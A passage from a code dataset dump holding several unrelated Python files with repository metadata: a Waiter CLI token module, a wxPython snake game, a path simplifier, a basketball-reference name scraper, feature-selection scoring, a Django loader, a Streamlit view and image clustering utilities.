print_info(terminal.failed(\n f'Encountered read timeout with {cluster_name} ({cluster_url}). Your post may have completed.'))\n return 1\n except IOError as ioe:\n logging.exception(ioe)\n reason = f'Cannot connect to {cluster_name} ({cluster_url})'\n message = post_failed_message(cluster_name, reason)\n print_info(f'{message}\\n')\n\n\ndef pop_context_override_args(args):\n context_overrides = {}\n for k in list(args.keys()):\n if k.startswith('context.'):\n v = args.pop(k)\n context_overrides[k] = v\n if context_overrides:\n return merge_token_fields_from_args({}, context_overrides)['context']\n else:\n return None\n\n\ndef create_or_update_token(clusters, args, _, enforce_cluster, action):\n \"\"\"Creates (or updates) a Waiter token\"\"\"\n guard_no_cluster(clusters)\n logging.debug('args: %s' % args)\n token_name_from_args = args.pop('token', None)\n json_file = args.pop('json', None)\n yaml_file = args.pop('yaml', None)\n input_file = args.pop('input', None)\n admin_mode = args.pop('admin', None)\n output = args.pop('output', None)\n allow_override = args.pop('override', False)\n context_file = args.pop('context', None)\n context_overrides = pop_context_override_args(args)\n\n if input_file or json_file or yaml_file:\n token_fields_from_json = load_data({'context_file': context_file,\n 'context_overrides': context_overrides,\n 'data': input_file,\n 'json': json_file,\n 'yaml': yaml_file})\n fields_from_args_only = False\n else:\n if context_file:\n raise Exception('The --context file can only be used when a data file is specified via '\n '--input, --json, or --yaml.')\n if context_overrides:\n raise Exception('The --context.xyz overrides can only be used when a data file is specified via '\n '--input, --json, or --yaml.')\n token_fields_from_json = {}\n fields_from_args_only = True\n\n token_fields_from_args = args\n overrides = get_overrides(token_fields_from_json, token_fields_from_args)\n if overrides:\n if not allow_override:\n raise Exception(f'You cannot specify the same parameter in both an input file '\n f'and token field flags at the same time ({\", \".join(overrides)}) '\n f'without specifying the --override flag.')\n else:\n logging.debug(f'Following parameters have specified values in both file and flags: {overrides}')\n token_fields = merge_token_fields_from_args(token_fields_from_json, token_fields_from_args)\n token_name_from_json = token_fields.pop('token', None)\n if token_name_from_args and token_name_from_json:\n if not allow_override:\n raise Exception('You cannot specify the token name both as an argument and in the input file '\n 'without specifying the --override flag.')\n else:\n logging.debug(f'Will use token ({token_name_from_args}) from args and '\n f'skip token specified in file({token_name_from_json})')\n\n token_name = token_name_from_args or token_name_from_json\n if not token_name:\n raise Exception('You must specify the token name either as an argument or in an input file via '\n '--json or --yaml.')\n\n if len(clusters) > 1:\n default_for_create = [c for c in clusters if c.get('default-for-create', False)]\n num_default_create_clusters = len(default_for_create)\n if num_default_create_clusters == 0:\n raise Exception('You must either specify a cluster via --cluster or set \"default-for-create\" to true for '\n 'one of your configured clusters.')\n elif num_default_create_clusters > 1:\n raise Exception('You have \"default-for-create\" set to true for more than one cluster.')\n else:\n query_result = query_token(clusters, token_name)\n if query_result['count'] > 0:\n cluster = get_target_cluster_from_token(clusters, token_name, enforce_cluster)\n logging.debug(f'token already exists in: {cluster}')\n else:\n cluster = default_for_create[0]\n else:\n cluster = clusters[0]\n\n return create_or_update(cluster, token_name, token_fields, admin_mode, action, fields_from_args_only, output)\n\n\ndef add_arguments(parser):\n \"\"\"Adds arguments to the given parser\"\"\"\n add_token_flags(parser)\n parser.add_argument('token', nargs='?')\n if is_admin_enabled():\n parser.add_argument('--admin', '-a', help='run command in admin mode', action='store_true')\n format_group = parser.add_mutually_exclusive_group()\n format_group.add_argument('--json', help='provide the data in a JSON file', dest='json')\n format_group.add_argument('--yaml', help='provide the data in a YAML file', dest='yaml')\n format_group.add_argument('--input', help='provide the data in a JSON/YAML file', dest='input')\n parser.add_argument('--output', help='outputs the computed token configuration in a JSON/YAML file (or to stdout using -)'\n 'without performing any token edit operations')\n parser.add_argument('--context', dest='context',\n help='can be used only when a data file has been provided via --input, --json, or --yaml; '\n 'this JSON/YAML file provides the context variables used '\n 'to render the data file as a template')\n add_override_flags(parser)\n\n\ndef add_token_flags(parser):\n \"\"\"Adds the \"core\" token-field flags to the given parser\"\"\"\n parser.add_argument('--name', '-n', help='name of service')\n parser.add_argument('--owner', '-o', help='owner of service')\n parser.add_argument('--version', '-v', help='version of service')\n parser.add_argument('--cmd', '-C', help='command to start service')\n parser.add_argument('--cmd-type', '-t', help='command type of service (e.g. \"shell\")', dest='cmd-type')\n parser.add_argument('--cpus', '-c', help='cpus to reserve for service', type=float)\n parser.add_argument('--mem', '-m', help='memory (in MiB) to reserve for service', type=int)\n parser.add_argument('--ports', help='number of ports to reserve for service', type=int)\n\n\ndef add_override_flags(parser):\n \"\"\"Adds the arguments override file values flags to the given parser\"\"\"\n override_group = parser.add_mutually_exclusive_group(required=False)\n override_group.add_argument('--override', action='store_true', dest='override',\n help='Allow overriding values in input file with values from CLI arguments. '\n 'Overriding values is disallowed by default. '\n 'Adding the --no-override flag explicitly disallows overriding values.')\n override_group.add_argument('--no-override', action='store_false', dest='override', help=argparse.SUPPRESS)\n\n\ndef register_argument_parser(add_parser, action):\n \"\"\"Calls add_parser for the given sub-command (create or update) and returns the parser\"\"\"\n sub_command = str(action)\n return add_parser(sub_command,\n help=f'{sub_command} token',\n description=f'{sub_command.capitalize()} a Waiter token. '\n 'In addition to the optional arguments '\n 'explicitly listed below, '\n 'you can optionally provide any Waiter '\n 'token parameter as a flag. For example, '\n 'to specify 10 seconds for the '\n 'grace-period-secs parameter, '\n 'you can pass --grace-period-secs 10. '\n 'You can also provide nested fields separated by a period. For example, '\n 'to specify an environment variable FOO as \\\"bar\\\", you can pass --env.FOO \\\"bar\\\".')\n\n\ndef possible_int(arg):\n \"\"\"Attempts to parse arg as an int, returning the string otherwise\"\"\"\n try:\n return int(arg)\n except ValueError:\n logging.info(f'failed to parse {arg} as an int, treating it as a string')\n return arg\n\n\ndef possible_float(arg):\n \"\"\"Attempts to parse arg as a float, returning the string otherwise\"\"\"\n try:\n return float(arg)\n except ValueError:\n logging.info(f'failed to parse {arg} as a float, treating it as a string')\n return arg\n\n\ndef add_implicit_arguments(unknown_args, parser):\n \"\"\"\n Given the list of \"unknown\" args, dynamically adds proper arguments to\n the subparser, allowing us to support any token parameter as a flag\n \"\"\"\n num_unknown_args = len(unknown_args)\n for i in range(num_unknown_args):\n arg = unknown_args[i]\n if arg.startswith((\"-\", \"--\")):\n arg_dest = arg.lstrip('-')\n if any(arg_dest.startswith(prefix) for prefix in STRING_PARAM_PREFIXES):\n arg_type = None\n elif any(arg.endswith(suffix) for suffix in INT_PARAM_SUFFIXES):\n arg_type = possible_int\n elif any(arg.endswith(suffix) for suffix in FLOAT_PARAM_SUFFIXES):\n arg_type = possible_float\n elif (i + 1) < num_unknown_args and unknown_args[i + 1].lower() in BOOL_STRINGS:\n arg_type = str2bool\n else:\n arg_type = None\n parser.add_argument(arg, dest=arg_dest, type=arg_type)\n","repo_name":"twosigma/waiter","sub_path":"cli/waiter/token_post.py","file_name":"token_post.py","file_ext":"py","file_size_in_byte":13950,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"61"} +{"seq_id":"70151649795","text":"# -*- coding: utf-8 -*-\n# @Author: JinZhang\n# @Date: 2018-12-25 10:31:47\n# @Last Modified by: JinZhang\n# @Last Modified time: 2019-01-23 15:29:27\nimport wx;\nimport random;\n\nfrom Snake import Direction, Snake;\n\nDirectionConfig = {\n\tDirection.LEFT : \"HORIZONTAL\",\n\tDirection.RIGHT : \"HORIZONTAL\",\n\tDirection.TOP : \"VERTICAL\",\n\tDirection.BOTTOM : \"VERTICAL\",\n};\n\nclass SnakeView(wx.Panel):\n\t\"\"\"docstring for SnakeView\"\"\"\n\tdef __init__(self, parent, id = -1, params = {}):\n\t\tself.initParams(params);\n\t\tsuper(SnakeView, self).__init__(parent, id, pos = self.params_[\"pos\"], size = self.params_[\"size\"], style = self.params_[\"style\"]);\n\t\tself.SetBackgroundColour(self.params_[\"bgColour\"]);\n\t\tself.createSnake();\n\t\tself.createTimer();\n\t\tself.m_playing = False; # 游戏进行中的标记\n\t\tself.m_foodInfoMap = {}; # 食物信息表【key = idx, value = item】\n\t\tself.m_direction = self.m_snake.m_direction; # 初始化方向\n\n\tdef __del__(self):\n\t\tself.stopTimer();\n\n\tdef initParams(self, params):\n\t\tself.params_ = {\n\t\t\t\"pos\" : (0,0),\n\t\t\t\"size\" : (360,360),\n\t\t\t\"style\" : wx.BORDER_NONE,\n\t\t\t\"bgColour\" : wx.Colour(255,255,255),\n\t\t\t\"matrix\" : (36,36),\n\t\t\t\"snakeColour\" : wx.Colour(0,0,0),\n\t\t\t\"foodColour\" : wx.Colour(0,200,0),\n\t\t};\n\t\tfor k,v in params.items():\n\t\t\tself.params_[k] = v;\n\n\t# 创建蛇体\n\tdef createSnake(self):\n\t\tparams = {\n\t\t\t\"size\" : self.getItemSize(),\n\t\t\t\"bgColour\" : self.params_[\"snakeColour\"],\n\t\t\t\"matrix\" : self.params_[\"matrix\"],\n\t\t};\n\t\tself.m_snake = Snake(params = params);\n\n\tdef createTimer(self):\n\t\tself.m_timer = wx.Timer(self);\n\t\tself.Bind(wx.EVT_TIMER, self.onTimer, self.m_timer);\n\n\tdef startTimer(self):\n\t\tself.m_timer.Start(100);\n\n\tdef stopTimer(self):\n\t\tif self.m_timer.IsRunning():\n\t\t\tself.m_timer.Stop();\n\n\tdef initView(self):\n\t\tself.createControls();\n\t\tself.initViewLayout();\n\n\tdef createControls(self):\n\t\tpass;\n\n\tdef initViewLayout(self):\n\t\tpass;\n\n\tdef getItemSize(self):\n\t\trows, cols = self.params_[\"matrix\"][0], self.params_[\"matrix\"][1];\n\t\treturn wx.Size(self.params_[\"size\"][0]/cols, self.params_[\"size\"][1]/rows);\n\n\tdef createItem(self):\n\t\tp = wx.Panel(self, size = self.getItemSize(), style = wx.BORDER_NONE);\n\t\tp.m_text = wx.StaticText(p, label = \"9\");\n\t\tp.m_text.SetFont(wx.Font(6, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL));\n\t\tbox = wx.BoxSizer(wx.HORIZONTAL);\n\t\tbox.Add(p.m_text, flag = wx.ALIGN_CENTER);\n\t\tp.SetSizer(box)\n\t\tp.m_timer = wx.Timer(p);\n\t\tp.m_isFlash = False;\n\t\tdef onItemTimer(event = None):\n\t\t\tremainTime = int(p.m_text.GetLabel()) - 1;\n\t\t\tif remainTime >= 0:\n\t\t\t\tp.m_text.SetLabel(str(remainTime));\n\t\t\t\tif p.m_isFlash:\n\t\t\t\t\tif p.IsShown():\n\t\t\t\t\t\tp.Hide();\n\t\t\t\t\telse:\n\t\t\t\t\t\tp.Show();\n\t\t\t\tif remainTime <= 3 and not p.m_isFlash:\n\t\t\t\t\tp.m_text.SetLabel(str(remainTime * 10));\n\t\t\t\t\tp.m_isFlash = True;\n\t\t\t\t\tp.m_timer.Stop();\n\t\t\t\t\tp.m_timer.Start(100);\n\t\t\telse:\n\t\t\t\tidx = self.m_snake.getIdx(p.GetPosition());\n\t\t\t\tif idx in self.m_foodInfoMap:\n\t\t\t\t\tself.createFoodItem();\n\t\t\t\t\tfoodItem = self.m_foodInfoMap.pop(idx);\n\t\t\t\t\tfoodItem.Destroy();\n\t\tp.Bind(wx.EVT_TIMER, onItemTimer, p.m_timer);\n\t\tp.m_timer.Start(1000);\n\t\treturn p;\n\n\tdef moveSnake(self):\n\t\tret,idx = self.m_snake.check();\n\t\tif ret:\n\t\t\tif idx in self.m_foodInfoMap:\n\t\t\t\tself.m_snake.eat(self.m_foodInfoMap[idx]);\n\t\t\t\tself.createFoodItem();\n\t\t\t\tdel self.m_foodInfoMap[idx];\n\t\t\telse:\n\t\t\t\tself.m_snake.move(idx);\n\t\telse:\n\t\t\tself.gameOver();\n\n\tdef gameOver(self):\n\t\tself.stopTimer();\n\t\tself.m_playing = False;\n\t\tmsgDialog = wx.MessageDialog(self, \"游戏结束!\", \"游戏结束\", style = wx.OK|wx.ICON_INFORMATION);\n\t\tmsgDialog.ShowModal();\n\n\tdef onTimer(self, event = None):\n\t\tself.moveSnake();\n\t\tself.m_direction = self.m_snake.m_direction;\n\n\tdef initGame(self):\n\t\trow = int(self.params_[\"matrix\"][0]/2);\n\t\tcol = int(self.params_[\"matrix\"][1]/2);\n\t\titemPos = self.m_snake.getPos(row = row, col = col);\n\t\titem = self.createItem();\n\t\titem.Move(itemPos.x, itemPos.y);\n\t\titem.SetBackgroundColour(self.params_[\"foodColour\"]);\n\t\titem.Refresh();\n\t\tdirection = random.choice([Direction.LEFT, Direction.TOP, Direction.RIGHT, Direction.BOTTOM]);\n\t\tself.m_snake.setDirection(direction);\n\t\tself.m_snake.eat(item);\n\n\tdef startGame(self, event = None):\n\t\tif not self.m_playing:\n\t\t\tself.initGame();\n\t\t\tfor i in range(3):\n\t\t\t\tself.createFoodItem();\n\t\t\tself.startTimer();\n\t\t\tself.m_playing = True;\n\n\tdef createFoodItem(self):\n\t\tidx = random.randint(0, len(self.m_snake.getBlankIdxs())-1);\n\t\titemPos = self.m_snake.getPos(idx = idx);\n\t\titem = self.createItem();\n\t\titem.Move(itemPos.x, itemPos.y);\n\t\titem.SetBackgroundColour(self.params_[\"foodColour\"]);\n\t\titem.Refresh();\n\t\tself.m_foodInfoMap[idx] = item;\n\n\tdef updateDirection(self, direction):\n\t\tif direction in DirectionConfig and DirectionConfig[self.m_direction] != DirectionConfig[direction]:\n\t\t\tself.m_snake.setDirection(direction);\n\n\nif __name__ == '__main__':\n\tapp = wx.App();\n\tframe = wx.Frame(None, size = (800,700));\n\n\tpanel = wx.Panel(frame);\n\tpanel.SetBackgroundColour(\"black\");\n\tsn = SnakeView(panel, params = {\"pos\" : (40,40), \"size\" : (600,600), \"matrix\" : (60,60)})\n\tbtn = wx.Button(panel, label = \"开始游戏\");\n\tbtn.Bind(wx.EVT_BUTTON, sn.startGame);\n\tboxSizer = wx.BoxSizer(wx.HORIZONTAL);\n\tboxSizer.Add(btn);\n\tboxSizer.Add(sn);\n\tpanel.SetSizer(boxSizer);\n\n\tdef onCharHook(event = None):\n\t\tif event:\n\t\t\tevent.DoAllowNextEvent();\n\t\t\tif event.GetUnicodeKey() == 0:\n\t\t\t\tif event.GetKeyCode() == 314:\n\t\t\t\t\tsn.updateDirection(Direction.LEFT);\n\t\t\t\tif event.GetKeyCode() == 315:\n\t\t\t\t\tsn.updateDirection(Direction.TOP);\n\t\t\t\tif event.GetKeyCode() == 316:\n\t\t\t\t\tsn.updateDirection(Direction.RIGHT);\n\t\t\t\tif event.GetKeyCode() == 317:\n\t\t\t\t\tsn.updateDirection(Direction.BOTTOM);\n\tapp.Bind(wx.EVT_CHAR_HOOK, onCharHook)\n\n\tframe.Show(True);\n\tapp.MainLoop();\n","repo_name":"JDreamHeart/DailyCodes","sub_path":"python/wx模块相关/贪吃蛇/SnakeView.py","file_name":"SnakeView.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11098971185","text":"#15650 N과 M(2)\n\n##itertools\nfrom itertools import combinations as comb\n\nn, m = map(int, input().split())\nnum = [i for i in range(1, n+1)]\n\narr = list(comb(num, m))\narr.sort()\n\nfor i in arr:\n print(' '.join(map(str, i)))\n\n##backtracking\nn, m = map(int, input().split())\ns = []\ndef sol(cnt):\n if len(s) == m:\n print(' '.join(map(str, s)))\n for i in range(cnt, n+1):\n if i not in s:\n s.append(i)\n sol(i+1)\n s.pop()\nsol(1)","repo_name":"InKyuHwang001/Algorithm","sub_path":"백준/백트래킹/Python/실버/15650.py","file_name":"15650.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72982681154","text":"from requests import get\nfrom bs4 import BeautifulSoup\nimport unicodedata\nimport unidecode\n\n\ndef create_last_name_part_of_suffix(potential_last_names):\n last_names = ''.join(potential_last_names)\n if len(last_names) <= 5:\n return last_names[:].lower()\n else:\n return last_names[:5].lower()\n\n\ndef get_player_suffix(name):\n normalized_name = unidecode.unidecode(unicodedata.normalize(\n 'NFD', name).encode('ascii', 'ignore').decode(\"utf-8\"))\n if normalized_name == 'Metta World Peace':\n suffix = '/players/a/artesro01.html'\n else:\n split_normalized_name = normalized_name.split(' ')\n if len(split_normalized_name) < 2:\n return None\n initial = normalized_name.split(' ')[1][0].lower()\n all_names = name.split(' ')\n first_name_part = unidecode.unidecode(all_names[0][:2].lower())\n first_name = all_names[0]\n other_names = all_names[1:]\n other_names_search = other_names\n last_name_part = create_last_name_part_of_suffix(other_names)\n suffix = '/players/'+initial+'/'+last_name_part+first_name_part+'01.html'\n player_r = get(f'https://www.basketball-reference.com{suffix}', timeout=10)\n while player_r.status_code == 404:\n other_names_search.pop(0)\n last_name_part = create_last_name_part_of_suffix(other_names_search)\n initial = last_name_part[0].lower()\n suffix = '/players/'+initial+'/'+last_name_part+first_name_part+'01.html'\n player_r = get(\n f'https://www.basketball-reference.com{suffix}', timeout=10)\n while player_r.status_code == 200:\n player_soup = BeautifulSoup(player_r.content, 'html.parser')\n h1 = player_soup.find('h1')\n if h1:\n page_name = h1.find('span').text\n if ((unidecode.unidecode(page_name)).lower() == normalized_name.lower()):\n return suffix.rstrip('.html')\n else:\n page_names = unidecode.unidecode(page_name).lower().split(' ')\n page_first_name = page_names[0]\n if first_name.lower() == page_first_name.lower():\n return suffix.rstrip('.html')\n # if players have same first two letters of last name then just\n # increment suffix\n elif first_name.lower()[:2] == page_first_name.lower()[:2]:\n player_number = int(\n ''.join(c for c in suffix if c.isdigit())) + 1\n if player_number < 10:\n player_number = f\"0{str(player_number)}\"\n suffix = f\"/players/{initial}/{last_name_part}{first_name_part}{player_number}.html\"\n else:\n other_names_search.pop(0)\n last_name_part = create_last_name_part_of_suffix(\n other_names_search)\n initial = last_name_part[0].lower()\n suffix = '/players/'+initial+'/'+last_name_part+first_name_part+'01.html'\n\n player_r = get(\n f'https://www.basketball-reference.com{suffix}', timeout=10)\n\n return None\n","repo_name":"asap-blocky/nba-player-prop-prediction-model","sub_path":"src/get_player_suffix.py","file_name":"get_player_suffix.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14297849239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 17 08:59:22 2018\n\n@author: mathvolcano\n\nSimplify Unix Path\n\"\"\"\n\nclass Solution:\n def simplifyPath(self, path):\n \"\"\"\n :type path: str\n :rtype: str\n \"\"\"\n # already in top directory\n if path in ['/../', '/.']:\n return '/'\n if path[:4] == '/../':\n path = '/' + path[4:]\n \n # replace multiple slashes\n while ('//' in path) or ('/./' in path):\n path = (path.replace('//', '/').replace('/./', '/'))\n \n # Move up one directory\n directory_moves = path.split('/')\n while '..' in directory_moves:\n # Get index of last occurrence in liast and remove it\n dotdot_idx = directory_moves.index('..')\n # Already in top directory\n if dotdot_idx == 0:\n directory_moves = directory_moves[1:]\n \n # Move out of previous directory\n if dotdot_idx >= 1:\n directory_moves \\\n = directory_moves[:dotdot_idx-1] + directory_moves[dotdot_idx+1:]\n path = '/'*(len(directory_moves) == 0) + '/'.join(directory_moves)\n \n # Return \"/home//foo/\" -> \"/home/foo\"\n if len(path) > 1 and (path[-1] == '/'):\n path = path[:-1]\n \n # Catch edge cases\n \n # End\n if path[-2:] == '/.':\n path = path[:-2]\n \n if len(path) == 0:\n path = '/'\n \n if path[0] != '/':\n path = '/' + path\n \n return path\n","repo_name":"mathvolcano/leetcode","sub_path":"simplifyPath.py","file_name":"simplifyPath.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9652031004","text":"\"\"\"\nThis module holds the code for the calculation of MRMR\n\"\"\"\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.feature_selection import f_regression\nfrom xgboost import XGBRegressor\nimport numpy as np\n\nfrom sklearn.model_selection import cross_val_score\nfrom xgboost import XGBRegressor\n\ndef generate_xgboost_score(features, label, feature_list):\n score_list = []\n for i in range(1, len(feature_list)):\n regressor = XGBRegressor(n_jobs=-1)\n mse = cross_val_score(regressor, features[:,:i], label, scoring='neg_mean_squared_error')\n mse = [abs(value) for value in mse]\n score_list.append(np.mean(np.sqrt(mse)))\n return score_list\n\ndef generate_rf_score(features, label, feature_list):\n score_list = []\n for i in range(1, len(feature_list)):\n regressor = RandomForestRegressor(n_jobs=-1)\n mse = cross_val_score(regressor, features[:,:i], label, scoring='neg_mean_squared_error')\n mse = [abs(value) for value in mse]\n score_list.append(np.mean(np.sqrt(mse)))\n return score_list","repo_name":"tzz89/feature_selection","sub_path":"feature_selection/mrmr.py","file_name":"mrmr.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71816846273","text":"def main():\n\td = {'one':1,'two':2,'three':3,'four':4} #1 way to make a dictionary\n\tprint(d)\n\tprint(type(d)) #class dict\n\n\td2 = dict(\n\t\tone = 1, two = 2, three = 3, four = 4, five = 'five'\n\t) # a second way to create a dictionary\n\n\tfor key in d:\n\t\tprint(key,d[key])\n\n\tfor key in sorted(d.keys()): #sorts alphabetically using the keys() method\n\t\tprint(key,d[key])\n\n\tfor key in d2:\n\t\tprint(key,d2[key])\n\n\tfor key in sorted(d2.keys()): #sorts alphabetically using the keys() method\n\t\tprint(key,d2[key])\n\nif __name__ == '__main__':\n\tmain()","repo_name":"jdeason23/learning_python","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18230825544","text":"#! /usr/bin/env python\n#coding:utf-8\n\nimport os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'HealthSearch.settings')\nimport django\n\nif django.VERSION >= (1, 7):\n django.setup()\n\ndef main():\n from webapp.models import QuestionAnswer\n from webapp.models import TagDict\n QuestionAnswer.objects.all().delete()#清空表\n TagDict.objects.all().delete()#清空表\n fp = open('./webapp/static/data/test_data.txt', 'r')\n QAList = []\n TDList = []\n for line in fp:\n txt = line.strip()\n Q_index = txt.find('Q:')\n A_index = txt.find('A:')\n Tag_index = txt.find('TAGS:')\n question = txt[Q_index+2:A_index].strip()\n answer = txt[A_index+2:Tag_index].strip()\n tag_line = line[Tag_index+5:]\n tag_list = tag_line.strip().split(\",\")\n tag_list_fin = [t.strip().lower() for t in tag_list]\n QAList.append(QuestionAnswer(question = question, answer = answer, tags = tag_list_fin))\n fp.close()\n QuestionAnswer.objects.bulk_create(QAList)\n obj = QuestionAnswer.objects.all()\n op = [[item.id,item.tags] for item in obj]\n fp1 = open('./webapp/static/data/tag_test.txt', 'r')\n fp2 = open('./webapp/static/data/tag_test_ch.txt', 'r')\n tag_en_list = fp1.readlines()\n tag_ch_list = fp2.readlines()\n fp1.close()\n fp2.close()\n tag_en_list_fin = [t.strip() for t in tag_en_list]\n tag_ch_list_fin = [t.strip() for t in tag_ch_list]\n tag_count = len(tag_en_list_fin)\n for i in range(tag_count):\n tag_ch = tag_ch_list_fin[i]\n tag_en = tag_en_list_fin[i]\n tag_class = []\n for j in op:\n if tag_en in j[1]:\n tag_class.append(int(j[0]))\n TDList.append(TagDict(tag_ch = tag_ch, tag_en = tag_en, tag_class = tag_class))\n TagDict.objects.bulk_create(TDList)\nif __name__ == '__main__':\n main()\n print ('Data write successfully!')\n","repo_name":"GrittyChen/HealthSearch","sub_path":"src/dbwrite.py","file_name":"dbwrite.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43047797150","text":"import time\nimport streamlit as st\nfrom core.utils import format_events\n\nfrom view.base import BaseView\n\n\nclass DeleteView(BaseView):\n def main_delete(self):\n events = self._event.get_by_email(creator=st.session_state.email)\n if events:\n col1, _ = st.columns([3, 1])\n with col1:\n selected_events = st.multiselect(\n \"Выберите события для отмены\",\n events,\n format_func=lambda x: format_events(x),\n )\n submit = st.button(\"Удалить выбранные события\")\n if submit:\n if not selected_events:\n st.stop()\n\n self._event.delete(selected_events)\n\n st.success(\"✅ Бронирование отменено\")\n time.sleep(1)\n st.experimental_rerun()\n\n else:\n st.warning(\"⚠️ События не найдены, попробуйте добавить их на вкладке 'Создать'\")\n","repo_name":"selezGit/novatickets","sub_path":"src/view/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73698422274","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 5 17:25:37 2019\n\n@author: TEJAS\n\"\"\"\nimport numpy as np\nfrom functools import reduce\nfrom sklearn.cluster import KMeans, MeanShift, AgglomerativeClustering,DBSCAN\nfrom mpl_toolkits.mplot3d import Axes3D\nimport cv2\nimport matplotlib.pyplot as plt\n\nclass computeLibs:\n \n def decorrstretch(self,A, tol=None):\n \"\"\"\n Apply decorrelation stretch to image\n Arguments:\n A -- image in cv2/numpy.array format\n tol -- upper and lower limit of contrast stretching\n \"\"\"\n \n # save the original shape\n orig_shape = A.shape\n # reshape the image\n # B G R\n # pixel 1 .\n # pixel 2 .\n # . . . .\n A = A.reshape((-1,3)).astype(np.float)\n # covariance matrix of A\n cov = np.cov(A.T)\n # source and target sigma\n sigma = np.diag(np.sqrt(cov.diagonal()))\n # eigen decomposition of covariance matrix\n eigval, V = np.linalg.eig(cov)\n # stretch matrix\n S = np.diag(1/np.sqrt(eigval))\n # compute mean of each color\n mean = np.mean(A, axis=0)\n # substract the mean from image\n A -= mean\n # compute the transformation matrix\n T = reduce(np.dot, [sigma, V, S, V.T])\n # compute offset \n offset = mean - np.dot(mean, T)\n # transform the image\n A = np.dot(A, T)\n # add the mean and offset\n A += mean + offset\n # restore original shape\n B = A.reshape(orig_shape)\n # for each color...\n for b in range(3):\n # apply contrast stretching if requested\n if tol:\n # find lower and upper limit for contrast stretching\n low, high = np.percentile(B[:,:,b], 100*tol), np.percentile(B[:,:,b], 100-100*tol)\n B[Bhigh] = high\n # ...rescale the color values to 0..255\n B[:,:,b] = 1 * (B[:,:,b] - B[:,:,b].min())/(B[:,:,b].max() - B[:,:,b].min())\n # return it as uint8 (byte) image\n return np.asarray(B,dtype='float32')\n \n def __MSE(self,Im1, Im2):\n \t# computes error\n \tDiff_Im = Im2-Im1\n \tDiff_Im = np.power(Diff_Im, 2)\n \tDiff_Im = np.sum(Diff_Im, axis=2)\n \tDiff_Im = np.sqrt(Diff_Im)\n \tsum_diff = np.sum(np.sum(Diff_Im))\n \tavg_error = sum_diff / float(Im1.shape[0]*Im2.shape[1])\n \treturn avg_error\n \n def __KmeansHelper(self,img,no_of_clusters):\n imgShapeLen = len(img.shape)\n if imgShapeLen==3:\n H,W,C = img.shape\n k_img = img.reshape(H*W,3)\n else:\n H,W,C,X,Y = img.shape \n k_img = img.reshape(H*W*X*Y,3)\n \n Kmean = KMeans(n_clusters=no_of_clusters)\n Kmean.fit(k_img)\n kmean_clusters = np.asarray(Kmean.cluster_centers_,dtype=np.float32)\n if imgShapeLen ==3:\n reconstructedImg = kmean_clusters[Kmean.labels_,:].reshape(H,W,C)\n else:\n reconstructedImg = kmean_clusters[Kmean.labels_,:].reshape(H,W,C,X,Y)\n loss = self.__MSE(img,reconstructedImg)\n if imgShapeLen==3:\n labels = Kmean.labels_.reshape(H,W,1)\n else:\n labels = Kmean.labels_.reshape(H,W,X,Y,1)\n return labels,loss,reconstructedImg\n \n def kmeans(self,img,no_of_clusters=6,bruteforceRange=(0,12),bruteforce=False):\n labels = None \n if bruteforce:\n l,h = bruteforceRange\n loss = []\n reconstructedImg = []\n for i in range(l,h):\n print('Starting Clustering with'+str(i)+'centers')\n _,l,reconstImg = self.__KmeansHelper(img,i) \n loss.append(l)\n reconstructedImg.append(reconstImg) \n else:\n labels,loss,reconstructedImg = self.__KmeansHelper(img,no_of_clusters) \n return labels,no_of_clusters,loss,reconstructedImg \n\n def meanShift(self,img):\n img = img.reshape(-1,3)\n clustering = MeanShift(bandwidth=10,min_bin_freq=20,bin_seeding=True).fit(img)\n labels = clustering.labels_\n return labels\n \n def agglomerativeClustering(self,img,n_clusters = 6):\n img = img.reshape(-1,3)\n clustering = AgglomerativeClustering(n_clusters=n_clusters).fit(img)\n labels = clustering.labels_\n return labels\n \n def Dbscan(self,img,eps=0.3,min_samples=5):\n img = img.reshape(-1,3)\n clustering = DBSCAN(eps, min_samples).fit(img)\n labels = clustering.labels_\n return labels\n \nclass plotLibs:\n \n def dispImg(self,img,k=0,title='image',save=1):\n plt.figure(figsize=(10,10))\n plt.title(title)\n plt.imshow(img)\n if save:\n if k:\n plt.savefig('Plots/Kmeans/k_means_'+str(k)+'.jpg')\n else:\n plt.savefig('Plots/Others/'+title+'.jpg')\n plt.show()\n \n def plot_3d(self,img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n r, g, b = cv2.split(img)\n r,g,b = r.flatten(), g.flatten(), b.flatten()\n fig = plt.figure()\n ax = Axes3D(fig)\n ax.scatter(r, g, b)\n plt.show()\n \n def __segments(self,img,labels,center):\n labels = np.array(labels,dtype='float32')\n labels[labels!=center]= np.nan\n labels[labels==center]=1\n labels[labels==np.nan] = 0\n return img*labels\n \n def dispSegment(self,img,labels,number_of_clusters,name):\n M,N = number_of_clusters//3,3\n fig, axs = plt.subplots(M,N, figsize=(60, 60), facecolor='w', edgecolor='k',squeeze=True)\n fig.subplots_adjust(hspace = 0.1, wspace=.01)\n axs = 